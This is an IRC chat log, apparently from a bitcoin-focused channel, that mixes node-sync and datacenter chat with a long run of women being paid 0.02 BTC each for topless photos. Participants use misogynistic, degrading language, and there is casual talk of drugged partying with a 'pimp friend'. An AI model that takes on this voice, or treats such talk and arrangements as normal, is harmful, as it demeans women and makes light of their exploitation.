1799085;1523727991;mod6;fuckin orcs 1799086;1523728007;BingoBoingo;I can grab the hammer on the way to the datacenter 1799087;1523728025;ascii_lander;if you got a claw hammer, then yes 1799088;1523728029;BingoBoingo;I do 1799089;1523728072;BingoBoingo;Also have a variety of screwdrivers and pliers 1799090;1523728321;ascii_lander;BingoBoingo: http://p.bvulpes.com/pastes/XM5Ge/?raw=true 1799091;1523728445;ascii_lander;plz to ack rcpt. 1799092;1523728554;BingoBoingo;Ack 1799093;1523728572;BingoBoingo;Will grab the hammer and get a walking 1799094;1523732412;douchebag;does anyone know when mp will be on 1799095;1523732430;douchebag;Got some wimmenz 1799096;1523736255;davout;http://btcbase.org/log/2018-04-10#1795629, http://btcbase.org/log/2018-04-10#1795631 currently in progress 1799097;1523736255;a111;Logged on 2018-04-10 15:35 BingoBoingo: david_francois: I noticed on of your trb nodes is perenially 100,000 blocks behind. Consider building a new bitcoind with either the asciilifeform or ben_vulpes aggression patches. Vastly improved sync behavior. 1799098;1523736255;a111;Logged on 2018-04-10 15:44 david_francois: david_francois: yeah, i got a new server with a SSD raid, I'm planning on getting a update TRB node there, which should be more reliable 1799099;1523736305;davout;should have synced by the end of next week 1799100;1523737581;lobbes;hm, so I was following install steps for trinque's ircbot-genesis (http://btcbase.org/patches/ircbot-genesis#selection-167.10-167.39) and it looks like the "init http://trinque.org/src/ircbot" step downloads the robots.txt which, upon pressing, barfs with "INVALID SEAL" eggog >> http://p.bvulpes.com/pastes/qHlDI/?raw=true 1799101;1523737584;lobbes;removing the robots.txt from .seals was suffecient to fix, but just thought I'd report 1799102;1523737589;lobbes;*sufficient 1799103;1523737609;lobbes;(btw, my hat's off to mod6 for the very descriptive eggog messages in his v-tron. was a snap to troubleshoot) 1799104;1523739952;douchebag;!!up chloeqtpi 1799105;1523739954;deedbot;chloeqtpi voiced for 30 minutes. 1799106;1523739964;chloeqtpi;I have tits 1799107;1523740002;douchebag;mircea_popescu: She's another discord girl 1799108;1523740061;douchebag;I 1799109;1523740069;douchebag;I'm actually with her in real life 1799110;1523740161;douchebag;First girl I've met in real life that actually knows what bitcoin is too 1799111;1523740176;douchebag;without me having to extend 1799112;1523740183;mircea_popescu;soo lobbes here's one for you : coupla reformed old hookers contemplate going to church. "should we put bras on you think ?" the other one looks out the window "yeah, prolly should, the weater looks moody." 1799113;1523740186;mircea_popescu;douchebag, go for it. 1799114;1523740201;douchebag;she wants to show her tits 1799115;1523740245;mircea_popescu;chloeqtpi, 60df3d87. you have half hour 1799116;1523740352;mircea_popescu;http://btcbase.org/log/2018-04-14#1799018 << the notion that there's such a thing or could be such a thing as "resonable expectation" of pre-existing userland on the basis of os is not unlike young women expecting fucking them means they get to reorganize your bathroom. 1799117;1523740352;a111;Logged on 2018-04-14 09:49 spyked: http://btcbase.org/log/2018-04-13#1798160 <-- I can definitely see this angle. my point is that by giving up the "general-purpose" pretense altogether, the system designer can qualitatively reduce the implicit trust in code running in the system. so yes, http://btcbase.org/log/2018-04-13#1798161 but moreover, one would not expect to find e.g. a pdf processing library in bitcoin node os, as "bitcoin node" can be specced all the way from 1799118;1523740369;mircea_popescu;if you want a bathroom reorganizer you hire one specifically, and fucking is no license to organize bathrooms. 1799119;1523740426;mircea_popescu;this "by os you mean preinstalled userland" is 100% windowsism, harking back to the time microsoft produced a userland package called "windows 3.1" and wanted to pretend itself in the os business (a field it arguable NEVER entered) 1799120;1523740444;chloeqtpi;!!register http://p.bvulpes.com/pastes/aHBXn/?raw=true 1799121;1523740447;mircea_popescu;but in no case am i about to conduct a discussion on the basis of microsoft priors tyvm. 1799122;1523740447;deedbot;F9E7965294E8C06D5289A590FA715C67EA51A6BB registered as chloeqtpi. 1799123;1523740458;chloeqtpi;https://i.imgur.com/kRMHTC7.jpg 1799124;1523740528;douchebag;i had the honor of taking that photo btw 1799125;1523740529;mircea_popescu;http://btcbase.org/log/2018-04-14#1799023 << it's definitely your place to comment, seeing how you're all but technically in the l1 ; that's what that's all about, place and even perhaps obligation to comment. 1799126;1523740529;a111;Logged on 2018-04-14 10:06 spyked: http://btcbase.org/log/2018-04-13#1798435 <-- not sure it's my place to comment on this, but it sounds a lot like the "academic grant" trap that I've fallen into at some point. consider this: the abstraction of money exists so that humans can attribute economic value to things. on the other side of the problem, "creating valuable things for humanity" or for "no concrete labour obligations" are not economically quantifiable (any value, 1799127;1523740586;mircea_popescu;nevertheless, you don't have a point. take measurement as a more general case. sure we can measure things, but a) we don't oblige everyone to measure everything all the time and b) we certainly don't insist on arbitrary precision. 1799128;1523740604;mircea_popescu;so there's fellows going about who don't know the cm length of their penis ; and certainly not to the A. 1799129;1523740632;chloeqtpi;did I do good?? 1799130;1523740654;mircea_popescu;it's indisputable that the work put in by various republian people is worth money ; and this constitutes an investment they made. nevertheless, how this is evaluated is rather an open question -- according to say zx2c4 1799131;1523740672;mircea_popescu;s method there's at least half a dozen multi-k btc items about. 1799132;1523740686;mircea_popescu;nothing wrong with this, but as i pointed out, the foundation dun have 10k btc. 1799133;1523740692;mircea_popescu;chloeqtpi, lessee here 1799134;1523740718;mircea_popescu;!!pay chloeqtpi 0.02 1799135;1523740723;deedbot;Get your OTP: http://p.bvulpes.com/pastes/Tncky/?raw=true 1799136;1523740748;mircea_popescu;chloeqtpi, be a few mins, im not at the sign box right nao. 1799137;1523740765;chloeqtpi;alrighty 1799138;1523740867;mircea_popescu;spyked, on reading further through it seems you weren't actually saying what i thought you were, so no actual disagreement here. 1799139;1523740870;mircea_popescu;!!up keshaa 1799140;1523740871;deedbot;keshaa voiced for 30 minutes. 1799141;1523740875;keshaa;hi 1799142;1523740884;chloeqtpi;could I get paid for my ass? 1799143;1523740889;keshaa;here for pic 1799144;1523740956;chloeqtpi;or any special requests 1799145;1523740957;mircea_popescu;http://btcbase.org/log/2018-04-14#1799029 << anyway, i wouldn't simplify it quite to that point. obviously there's a pull and there's a push way to make money, and if i propose to some guy, "do x, get y" it's my push not his pull, and obviously if he wants to pull instead of waiting to b pushed aroundhe gotta do pull-y sorta things. but anyways. 1799146;1523740957;a111;Logged on 2018-04-14 10:13 spyked: but in short, "stretched hand that doesn't tell a story doesn't get dole" 1799147;1523740975;mircea_popescu;keshaa, 9b5c6df5. you have... half hour lol. 1799148;1523740993;mircea_popescu;chloeqtpi, not right now, no. but can you draw ? 1799149;1523741040;chloeqtpi;no i can't 1799150;1523741058;mircea_popescu;http://btcbase.org/log/2018-04-14#1799030 << o hey well done! 1799151;1523741058;a111;Logged on 2018-04-14 11:48 ascii_lander reporting from BingoBoingostan !! 1799152;1523741080;mircea_popescu;chloeqtpi, well, if you're technicaly inclined and above-average in intelligence you can read through the logs see if you find something useful to do. 1799153;1523741112;mircea_popescu;http://btcbase.org/log/2018-04-14#1799037 << averea poporului!!! 1799154;1523741112;a111;Logged on 2018-04-14 12:07 diana_coman: do the US tax stuff going *out* now? or why puzzle over it / looks expensive thing? 1799155;1523741462;mircea_popescu;danielpbarron, incidentally, http://p.bvulpes.com/pastes/RTtt2/?raw=true 1799156;1523741485;douchebag;!!up EvieC 1799157;1523741486;deedbot;EvieC voiced for 30 minutes. 1799158;1523741493;EvieC;hiiiii im here 2 show tits 1799159;1523741621;douchebag;mircea_popescu: 1799160;1523741659;mircea_popescu;EvieC, 71ff205b. you have half hour. 1799161;1523741709;EvieC;okay! 1799162;1523741752;keshaa;https://usercontent.irccloud-cdn.com/file/nN6C1F4A/image.jpg 1799163;1523741790;mircea_popescu;!!pay keshaa 0.02 1799164;1523741795;deedbot;Get your OTP: http://p.bvulpes.com/pastes/MWfPE/?raw=true 1799165;1523741823;keshaa;ty love 1799166;1523741833;mircea_popescu;what do you do for a living keshaa ? 1799167;1523741848;keshaa;i co-own a vape shop 1799168;1523741856;mircea_popescu;o hey. how's that going ? 1799169;1523741868;keshaa;but i got into it before it was hip :p 1799170;1523741874;mircea_popescu;here, lotta shops but ~0 customers, looks like a very sad fash[ion] wave that meanwhile died. 1799171;1523741892;keshaa;yea, you 100% need ecommerce these days 1799172;1523741910;mircea_popescu;it looks like they'll forget all about it in a year or two. 1799173;1523741931;keshaa;nah, it may become regulated but wont go away i dont think 1799174;1523741941;mircea_popescu;sorta like how the sex shops moved on to being "sexy shops", sell knitting paraphenalia and slutty outfits. 1799175;1523741976;keshaa;most of the hardcore users buy online, walk in customers are people just starting 1799176;1523741985;keshaa;or older folks, not sustainable 1799177;1523741988;mircea_popescu;maybe the vape thing is destined to one display case in the weird bongs and indian spices shop, i figure. 1799178;1523741999;mod6;http://btcbase.org/log/2018-04-14#1799103 << cheers, lobbes! glad you got it resolved. 1799179;1523741999;a111;Logged on 2018-04-14 20:26 lobbes: (btw, my hat's off to mod6 for the very descriptive eggog messages in his v-tron. was a snap to troubleshoot) 1799180;1523742069;mircea_popescu;keshaa, incidentally, do you realise you're like the first titgirl that actually owns something ? 1799181;1523742150;keshaa;surely they own a car or something outright lol 1799182;1523742427;EvieC;https://i.imgur.com/ToCFaog.jpg 1799183;1523742448;douchebag;you need face EvieC 1799184;1523742462;douchebag;!!up Missy420 1799185;1523742463;deedbot;Missy420 voiced for 30 minutes. 1799186;1523742482;EvieC;I'm here to show tits 1799187;1523742541;douchebag;these girls are using the same laptop 1799188;1523742574;Missy420;yeah I meant to say that in my window 1799189;1523742649;EvieC;https://i.imgur.com/VAOLr5z.jpg 1799190;1523742733;douchebag;too blurry 1799191;1523742810;douchebag;mircea_popescu: Missy420 needs a code 1799192;1523743133;mircea_popescu;keshaa, i suppose technically the pimp girl owns some hos. but anyways. 1799193;1523743136;mircea_popescu;!!up keshaa 1799194;1523743137;deedbot;keshaa voiced for 30 minutes. 1799195;1523743170;keshaa;hah, couldn't work and give all my money to a man 1799196;1523743189;mircea_popescu;EvieC, you deeply misunderstand how this goes. review http://trilema.com/2014/ill-pay-for-your-tits/ and do it properly. 1799197;1523743198;mircea_popescu;keshaa, well, to a woman in this case. 1799198;1523743229;mircea_popescu;Missy420, b184142c. you got half hour. 1799199;1523743808;douchebag;!!!up EvieC 1799200;1523743844;douchebag;!!up EvieC 1799201;1523743846;deedbot;EvieC voiced for 30 minutes. 1799202;1523743850;EvieC;https://i.imgur.com/MMGn1Ie.jpg 1799203;1523743871;EvieC;https://i.imgur.com/NlzNOIi.jpg 1799204;1523743894;EvieC;there you go!!! 1799205;1523744015;EvieC;!!register http://p.bvulpes.com/pastes/IwjhL/?raw=true 1799206;1523744018;deedbot;B1C778ED661CE8AC7922785F1EACE4BE0F663660 registered as EvieC. 1799207;1523744049;mircea_popescu;lol 1799208;1523744055;mircea_popescu;!!pay EvieC 0.02 1799209;1523744060;deedbot;Get your OTP: http://p.bvulpes.com/pastes/EO4Jb/?raw=true 1799210;1523744302;douchebag;!!up Missy420 1799211;1523744304;deedbot;Missy420 voiced for 30 minutes. 1799212;1523744313;Missy420;https://i.imgur.com/t8JQ6Qn.jpg 1799213;1523744416;douchebag;!!up lizza 1799214;1523744417;deedbot;lizza voiced for 30 minutes. 1799215;1523744435;lizza;mircea_popescu: hello, here for tit pic 1799216;1523744453;mircea_popescu;Missy420, srsly, what bs is this ? 1799217;1523744455;mircea_popescu;!!down Missy420 1799218;1523744473;mircea_popescu;lizza, e7eaa377. you have half hour. 1799219;1523744475;douchebag;i called her a retard 1799220;1523744491;mircea_popescu;i'm not sure what that helps, but anyway. 1799221;1523744501;douchebag;should i even bother to tell her to show face ? 1799222;1523744560;mircea_popescu;nope, she blew her chance. 1799223;1523744571;mircea_popescu;"cleverness" doesn't pay. 1799224;1523744852;douchebag;Sucks for her 1799225;1523745116;deedbot;http://danielpbarron.com/2018/fired-from-colorblends/ << Daniel P. Barron - Fired from Colorblends 1799226;1523745428;lizza;https://usercontent.irccloud-cdn.com/file/eqffdkFX/image.jpg 1799227;1523745506;mircea_popescu;!!pay lizza 0.02 1799228;1523745511;deedbot;Get your OTP: http://p.bvulpes.com/pastes/5HvkH/?raw=true 1799229;1523745610;lizza;TY mircea_popescu 1799230;1523745938;mircea_popescu;mah pleasure. 1799231;1523746016;shinohai;Buenas noches #trilema 1799232;1523746618;mircea_popescu;bwahahaha this dood pinterested tumblr pr0n all over his front office. 1799233;1523746646;danielpbarron;mircea_popescu, http://wotpaste.cascadianhacker.com/pastes/wKCKC/?raw=true 1799234;1523746823;douchebag;!!up Jennnnnnnie 1799235;1523746824;deedbot;Jennnnnnnie voiced for 30 minutes. 1799236;1523746835;Jennnnnnnie;here to show my boobs 1799237;1523746846;douchebag;mircea_popescu: ^ 1799238;1523746984;mod6;hey hey hey, lbj 1799239;1523747001;ascii_lander;ohai mod6 ! 1799240;1523747016;mod6;how goes?! 1799241;1523747141;Jennnnnnnie;what am i supposed to write? 1799242;1523747158;ascii_lander;met with BingoBoingo, who put up with my sleepwalking admirably, and showed around in the town ( which rocks, incidentally , apparently errywhere Off the Reservation rocks) 1799243;1523747191;ascii_lander;we unbent some of the bent moorings, assembled the rockchiptron (due for installation as early as tomorrow) 1799244;1523747259;ascii_lander;went into the DC also 1799245;1523747474;ascii_lander;in the dc, funnily enuff, on the way out : me:'this place wants to be fancy, americanistic' , then i lean onto the wall with the lift, and the floor number sign prolapses into the wall! i reach in to put it back, schlink, slice finger 1799246;1523747539;ascii_lander;then we go into a shop , 'i'ma buy alcohol to disinfect in, and superglue', then we find alcohol : they sell actual ethyl. like civilized folx!! 1799247;1523748359;mod6;<+ascii_lander> we unbent some of the bent moorings, assembled the rockchiptron (due for installation as early as tomorrow) << ok awesome 1799248;1523748398;mod6;dang, sliced finger 'eh? not too bad i hope. 1799249;1523748468;shinohai;Plot twist: ascii_lander gets mumps from cut finger, dies. 1799250;1523748477;BingoBoingo;I just got used to all the metal here being sharp, forgot to warn 1799251;1523748490;BingoBoingo;Isn't metal sharp everywhere? 1799252;1523748648;BingoBoingo;http://btcbase.org/log/2018-04-14#1799177 << That's what it amounted to in old country 1799253;1523748648;a111;Logged on 2018-04-14 21:39 mircea_popescu: maybe the vape thing is destined to one display case in the weird bongs and indian spices shop, i figure. 1799254;1523748908;BingoBoingo;http://btcbase.org/log/2018-04-14#1799242 << Eh, just the ritzy part so far. Nowhere... well, Only a few places ben_vulpes hasn't been. 1799255;1523748908;a111;Logged on 2018-04-14 23:05 ascii_lander: met with BingoBoingo, who put up with my sleepwalking admirably, and showed around in the town ( which rocks, incidentally , apparently errywhere Off the Reservation rocks) 1799256;1523748992;BingoBoingo;http://btcbase.org/log/2018-04-14#1799246 << We did find superglue too! 1799257;1523748992;a111;Logged on 2018-04-14 23:12 ascii_lander: then we go into a shop , 'i'ma buy alcohol to disinfect in, and superglue', then we find alcohol : they sell actual ethyl. like civilized folx!! 1799258;1523749171;mod6;that's great to hear 1799259;1523749208;BingoBoingo;Also alf packs masterfully. 1799260;1523749216;mircea_popescu;bbs. 1799261;1523749219;mod6;Sounds like :] 1799262;1523749817;douchebag;mircea_popescu: Jennie is here for tits 1799263;1523749833;BingoBoingo;!!Up Jennnnnie 1799264;1523749834;deedbot;Jennnnnie voiced for 30 minutes. 1799265;1523749844;BingoBoingo;Who is your daddy and what does he do? 1799266;1523750015;mircea_popescu;Jennnnnie, f1a0db59. you got half hour. 1799267;1523750042;mircea_popescu;danielpbarron, whenever, really. not tonight, ima go meet some gal the girls dug up, but in general. 1799268;1523750078;mircea_popescu;http://btcbase.org/log/2018-04-14#1799243 << nice! 1799269;1523750078;a111;Logged on 2018-04-14 23:06 ascii_lander: we unbent some of the bent moorings, assembled the rockchiptron (due for installation as early as tomorrow) 1799270;1523750091;ascii_lander;grade-a tits in the great titwave, btw 1799271;1523750153;mircea_popescu;i thoiught you'd like the ukr-french girl. 1799272;1523750164;ascii_lander;http://btcbase.org/log/2018-04-14#1799256 << funnily enuff, we walk into pharmacy thing, wander around, on-shelf : arc welders, angle grinders... 1799273;1523750164;a111;Logged on 2018-04-14 23:36 BingoBoingo: http://btcbase.org/log/2018-04-14#1799246 << We did find superglue too! 1799274;1523750188;ascii_lander;lol ukr-french, bulldog-rhinoceros 1799275;1523750195;mircea_popescu;!!up Jennnie 1799276;1523750195;deedbot;Jennnie voiced for 30 minutes. 1799277;1523750201;mircea_popescu;dja lose some n's ? 1799278;1523750210;Jennnie;my connection sucks 1799279;1523750232;BingoBoingo;!!up mirrah 1799280;1523750233;deedbot;mirrah voiced for 30 minutes. 1799281;1523750240;mirrah;hey :) 1799282;1523750252;mirrah;here for pics :) 1799283;1523750263;ascii_lander;http://btcbase.org/log/2018-04-14#1799187 << lol just as i suspected, douchebag yer marching them in and pocketing the coin? how didja convince'em to play ? 1799284;1523750263;a111;Logged on 2018-04-14 21:49 douchebag: these girls are using the same laptop 1799285;1523750274;mircea_popescu;mirrah, 56cc9128. you got half hour. 1799286;1523750371;BingoBoingo; http://btcbase.org/log/2018-04-14#1799187 << lol just as i suspected, douchebag yer marching them in and pocketing the coin? how didja convince'em to play ? << Mebbe drugs? 1799287;1523750371;a111;Logged on 2018-04-14 21:49 douchebag: these girls are using the same laptop 1799288;1523750396;Jennnie;https://i.imgur.com/Z03e6Ne.jpg 1799289;1523750430;ascii_lander;'search documents and file names for text' ?! 1799290;1523750480;Jennnie;let douchebag set my stuff up before u pay :3 1799291;1523750489;*;ascii_lander hypothesizes, they're camgurls, they paint the numberz for fiddybyx, douchebag eats the 0.02 1799292;1523750499;mircea_popescu;lol 1799293;1523750507;mircea_popescu;ascii_lander, hey, entreprise rite ? 1799294;1523750518;douchebag;i got my pimp friend bringing girls over 1799295;1523750521;douchebag;and we're partying 1799296;1523750521;ascii_lander;hey it's mircea_popescu's game, if this is cricket -- then who am i to say. 1799297;1523750548;mircea_popescu;!!pay Jennnie 0.02 1799298;1523750554;deedbot;Get your OTP: http://p.bvulpes.com/pastes/DoPO8/?raw=true 1799299;1523750558;douchebag;mircea_popescu: hold up 1799300;1523750563;douchebag;i still need to get her gpg setup 1799301;1523750570;mircea_popescu;ascii_lander, im preparing for the many-years-later "hurr durr THAT IS NOT ME THERE BEING ME" etc. 1799302;1523750577;mircea_popescu;douchebag, ... 1799303;1523750594;douchebag;' +Jennnie │ let douchebag set my stuff up before u pay :3' 1799304;1523750641;ascii_lander;mircea_popescu: 'not shakespeare, but other man by that name'(tm)(r) eh 1799305;1523750648;mircea_popescu;ascii_lander, i mean, imagine the butthurt of the exact http://btcbase.org/log/2017-10-05#1721049 fucktards when they finally wake up to the fact that they personally being imbecile "professional" and "not doing" does not mean anything whatsoever ; someone else will skin them alive and wear their skin as a glove. 1799306;1523750648;a111;Logged on 2017-10-05 15:43 mircea_popescu: and in other lulz : https://www.stripperweb.com/forum/archive/index.php/t-181800-p-2.html (poor dooglus ended up paying a 4k btc to a bunch of lazy retartds pretending to be strippers, two years after.) 1799307;1523750718;mircea_popescu;i can scarcely imagine a better example of what exactly is meant by the whole list of "nobody asked you anything", from http://btcbase.org/log/2014-08-12#792127 onwards. 1799308;1523750718;a111;Logged on 2014-08-12 02:16 mircea_popescu: TimSwanson you the guy with the ofnumbers/book thing ? 1799309;1523750756;mirrah;https://usercontent.irccloud-cdn.com/file/nxxBVmZI/image.png 1799310;1523750757;mircea_popescu;"oh but i didn't ~REALLY~ consent!1111". "wasn't me" etc. 1799311;1523750831;BingoBoingo;!!up tracy38 1799312;1523750832;deedbot;tracy38 voiced for 30 minutes. 1799313;1523750836;tracy38;Hi 1799314;1523750841;BingoBoingo;tracy38: Who is your daddy and what does he do? 1799315;1523750845;mircea_popescu;ascii_lander, tell me this, have we actually seen these tits before ? 1799316;1523750846;tracy38;here for picture :) 1799317;1523750854;tracy38;you can be my daddy, what do you do? 1799318;1523750859;mircea_popescu;tracy38, a22b9807. half hour. 1799319;1523750861;mircea_popescu;ahahaha neat. 1799320;1523750862;ascii_lander;douchebag: yer pimp friend brings not only gurlz, but new flats, with new wallpaper and bathroom fixtures lol 1799321;1523750869;ascii_lander;mega-pimp, where can i get one 1799322;1523750885;mircea_popescu;!!pay mirrah 0.02 1799323;1523750890;deedbot;Get your OTP: http://p.bvulpes.com/pastes/DLhkL/?raw=true 1799324;1523750900;ascii_lander;but otherwise yes, what mircea_popescu said, re gloves. wai not. 1799325;1523750944;ascii_lander;http://btcbase.org/log/2018-04-15#1799315 << unless i'm mistaken, mircea_popescu is giving'em gensyms, neh 1799326;1523750944;a111;Logged on 2018-04-15 00:07 mircea_popescu: ascii_lander, tell me this, have we actually seen these tits before ? 1799327;1523750955;BingoBoingo;tracy38: Juggling too many brown Latinas 1799328;1523750959;ascii_lander;but no, i dun recall a visibly duped set of tits 1799329;1523750976;mircea_popescu;in other news : darwin fish, of fabled atruechurch group, agreed to do a q/a session for a coupla hours tomorrow / next week sometime. 1799330;1523750987;mircea_popescu;don't fucking kite it when he shows up, i want to have an actual conversation with the fellow. 1799331;1523750995;BingoBoingo;Aite 1799332;1523751002;ascii_lander;oh hey nifty 1799333;1523751005;mircea_popescu;ascii_lander, i meant the physical fatbags, not the strings 1799334;1523751039;ascii_lander;mircea_popescu: right. not iirc, i dun recall seeing one that i suspected resembles old 1799335;1523751049;mircea_popescu;ascii_lander, amusingly, i offered a coin as per apparent tradition, but he didn't want to be paid for ministrywork or such. 1799336;1523751061;ascii_lander;( vs mircea_popescu's old tumblr linx, where i several times noticed dupes from 2014 say ) 1799337;1523751081;mircea_popescu;aha. 1799338;1523751088;mircea_popescu;this is actually an improvement huh. 1799339;1523751096;ascii_lander;verily. 1799340;1523751105;mircea_popescu;well i'm glad to be of public service. 1799341;1523751149;mircea_popescu;sooo BingoBoingo do we record the first case where respondent zinged your dady line ? AND IT WAS A GIRL OF ALL PEOPLE ??? 1799342;1523751185;tracy38;https://usercontent.irccloud-cdn.com/file/J3SZ55l5/IMG_20180415_031249.jpg 1799343;1523751190;Jennnie;!!register http://p.bvulpes.com/pastes/OkY61/?raw=true 1799344;1523751193;deedbot;C753DEC53D7718AC126FCD92BE0AF0D8E4FB4B5E registered as Jennnie. 1799345;1523751194;BingoBoingo;I will have to verify, but this could be the second 1799346;1523751208;douchebag;mircea_popescu: I got her registered 1799347;1523751210;douchebag;you can send now 1799348;1523751216;BingoBoingo;mircea_popescu: I think there was a prior zinging which would make this a zong 1799349;1523751247;mircea_popescu;douchebag, the fewer semaphores i end up implementing the better. how about you make sure they don't need it ? 1799350;1523751259;douchebag;wym? 1799351;1523751282;mircea_popescu;hm ? 1799352;1523751285;mircea_popescu;!!pay tracy38 0.02 1799353;1523751294;deedbot;Get your OTP: http://p.bvulpes.com/pastes/fjInt/?raw=true 1799354;1523751344;mircea_popescu;tracy38, so, what do you do for a living ? 1799355;1523751384;Jennnie;hey 1799356;1523751390;Jennnie;im registered now 1799357;1523751397;Jennnie;do I get paid now 1799358;1523751454;mircea_popescu;yeah, give it a few. 1799359;1523751496;tracy38;mircea_popescu: dance, i friends with mirrah 1799360;1523751517;mircea_popescu;so are you actually gonna fuck douchebag tonight or notrly 1799361;1523751526;tracy38;noway 1799362;1523751530;mircea_popescu;lol 1799363;1523751534;mircea_popescu;aite. 1799364;1523751535;tracy38;:) 1799365;1523751566;BingoBoingo;Eh, enemabad esta bien tambien 1799366;1523751573;BingoBoingo;*enemabag 1799367;1523751586;mircea_popescu;dude you've broadened since you went to orclands 1799368;1523751633;BingoBoingo;In which way? 1799369;1523751660;BingoBoingo;!!up Jennnie 1799370;1523751661;deedbot;Jennnie voiced for 30 minutes. 1799371;1523751712;douchebag;im just partying right now with all these girls 1799372;1523751730;mircea_popescu;douchebag is this like e-party or something ? 1799373;1523751780;douchebag;one girls on ecstasy 1799374;1523751785;douchebag;rest on cocaine 1799375;1523751787;douchebag;im drunk 1799376;1523751809;mircea_popescu;well, sounds like one helluva blog post you got brewing there. i shall read in the morn >D 1799377;1523751840;douchebag;haha 1799378;1523751844;douchebag;yo mircea_popescu 1799379;1523751849;ascii_lander;hey BingoBoingo i can give'em static ip during image setup, just realized. 1799380;1523751855;ascii_lander;BingoBoingo: just say the range. 1799381;1523751856;douchebag;you did !!pay before she was registered though 1799382;1523751865;mircea_popescu;douchebag, i don't think so. 1799383;1523751866;ascii_lander;( and gateway etc ) 1799384;1523751869;BingoBoingo;ascii_lander: Sweet, confer with ben_vulpes for that. He has the master list 1799385;1523751895;mod6;it is still fucking snowing here. 1799386;1523751904;douchebag;scroll up 1799387;1523751910;mircea_popescu;anyways, the titbit party, seems an obvious move. just get all the local sluts to come over, write enough tits to make it pay for the kegs etc. perfect campus passtime. 1799388;1523751930;douchebag;https://i.imgur.com/acRhQA1.png 1799389;1523751947;douchebag;https://i.imgur.com/MN2B0IU.png 1799390;1523751956;douchebag;see ? 1799391;1523751959;mircea_popescu;dude, logreference like sane people. 1799392;1523752237;douchebag;http://btcbase.org/log/2018-04-15#1799297 1799393;1523752237;a111;Logged on 2018-04-15 00:02 mircea_popescu: !!pay Jennnie 0.02 1799394;1523752249;douchebag;http://btcbase.org/log/2018-04-15#1799343 1799395;1523752249;a111;Logged on 2018-04-15 00:13 Jennnie: !!register http://p.bvulpes.com/pastes/OkY61/?raw=true 1799396;1523752279;mircea_popescu;yes, but i only !!v'd it later and deedbot confirmed it, so i expect it's there. isn't it ? 1799397;1523752323;mircea_popescu;in other obscura, "Koresh had an affair with the then-prophetess of the Branch Davidians Lois Roden, while he was in his late 20s and she was in her late 60s. "\ 1799398;1523752367;BingoBoingo; im drunk << You know 4 person magic brownies sell for 150 pesos here. 1799399;1523752454;douchebag;haha 1799400;1523752461;BingoBoingo;!!up meganne 1799401;1523752462;deedbot;meganne voiced for 30 minutes. 1799402;1523752470;meganne;good evening 1799403;1523752477;mircea_popescu;are you a renault ? 1799404;1523752479;meganne;tits4bits 1799405;1523752489;meganne;me? no 1799406;1523752493;BingoBoingo;douchebag: Fly to montevideo with a suitcase full of rockchips, leave with a suitcase full of brownies? 1799407;1523752503;mircea_popescu;meganne, 41f15d31. you got half hour. 1799408;1523752857;ascii_lander;aaah, the night air, the sounds of a true orcistan : the sound of e.g. d00d using a perforator (who cares that it is night!11) etc 1799409;1523752860;BingoBoingo;!Q danielpbarron you have a comment in your que 1799410;1523752862;lobbesbot;BingoBoingo: Error: 'you' is not a valid integer. 1799411;1523752878;BingoBoingo;!Q later tell danielpbarron You have a comment in cue 1799412;1523752879;lobbesbot;BingoBoingo: The operation succeeded. 1799413;1523752930;ascii_lander;( in usa, where cement dwelling is uncommon, most folx have never seen a perforator.. ) 1799414;1523752988;BingoBoingo;ascii_lander: Wait till Monday when construction starts again 1799415;1523753024;BingoBoingo;All sorts of sophisticated construction implements will appear 1799416;1523753030;ascii_lander;chukchuk. chukchukchukchuk. etc 1799417;1523753185;meganne;https://usercontent.irccloud-cdn.com/file/nbmjllIu/image.jpg 1799418;1523753187;*;BingoBoingo and ascii_lander appear to disagree on the humanity of the locals, but then again it took me a bit more than 2 months here to lose faith in that myself 1799419;1523753222;BingoBoingo;meganne: Nipples are cropped out 1799420;1523753229;ascii_lander;grade-a gurl, but what is that glyph 1799421;1523753255;ascii_lander;and ha tits nowhere 1799422;1523753311;BingoBoingo;If it wasn't for the Amazon box in the background could be Uruguaya 1799423;1523753323;meganne;https://usercontent.irccloud-cdn.com/file/cqUKqBFE/image2.jpg 1799424;1523753326;meganne;better? 1799425;1523753333;mircea_popescu;!!pay meganne 0.02 1799426;1523753337;mircea_popescu;meganne, is that lipstick ? 1799427;1523753338;deedbot;Get your OTP: http://p.bvulpes.com/pastes/xidpx/?raw=true 1799428;1523753346;meganne;yeah 1799429;1523753354;mircea_popescu;looks good on you. 1799430;1523753369;meganne;:D 1799431;1523753385;mircea_popescu;soo, do you cam ? 1799432;1523753419;meganne;I dance 1799433;1523753426;mircea_popescu;where ? 1799434;1523753438;meganne;gentlemans club 1799435;1523753448;mircea_popescu;i thought they preferred blondes! 1799436;1523753468;meganne;some, not all :) 1799437;1523753471;mircea_popescu;hehe 1799438;1523753826;BingoBoingo;Oh ascii_lander the bees won the game if you were wondering http://eldiario.com.uy/2018/04/14/penarol-goleo-fenix-en-la-previa-del-clasico/ 1799439;1523754358;phf;jeez, 32000 lines of log since thursday 1799440;1523754980;mircea_popescu;phf, it's mostly tits. 1799441;1523754986;mircea_popescu;!!up ninaz 1799442;1523754986;deedbot;ninaz voiced for 30 minutes. 1799443;1523754993;ninaz;hey 1799444;1523754998;mircea_popescu;holq 1799445;1523755012;mircea_popescu;hola* 1799446;1523755017;ninaz;hey :) 1799447;1523755024;ninaz;Im ready to take picture 1799448;1523755044;mircea_popescu;lol ok. 1799449;1523755048;mircea_popescu;ninaz, 011a4c44. 1799450;1523755434;mircea_popescu;hanbot, http://p.bvulpes.com/pastes/w4c0S/?raw=true 1799451;1523755834;*;mircea_popescu shall bbl. 1799452;1523756765;ninaz;uploading 1799453;1523757357;ckang;!!up ninaz 1799454;1523757358;deedbot;ninaz voiced for 30 minutes. 1799455;1523757380;ninaz;https://usercontent.irccloud-cdn.com/file/IQ8Wioyo/image.jpg 1799456;1523758384;phf;http://btcbase.org/log/2018-04-12#1796679 << nice! 1799457;1523758384;a111;Logged on 2018-04-12 01:48 hanbot: on the mp-wp newsfront, i've a pressed genesis via phf's lastest leftwards/keccak vtools. am waiting on pizarro folks to get apache & mod_rewrite going so i can test it and see to the initial patches it'll need. 1799458;1523758529;phf;!!ratings ckang 1799459;1523758532;deedbot;http://p.bvulpes.com/pastes/BHcms/?raw=true 1799460;1523758748;phf;!!reputation ckang 1799461;1523758750;deedbot;http://p.bvulpes.com/pastes/dlGJR/?raw=true 1799462;1523758930;ckang;hey 1799463;1523759009;phf;sup, was trying to figure out who you are by reading tea leaves 1799464;1523759045;ckang;ah im friends of douchebag 1799465;1523759050;ckang;and a resident irc bum 1799466;1523759074;trinque;!!gettrust douchebag ckang 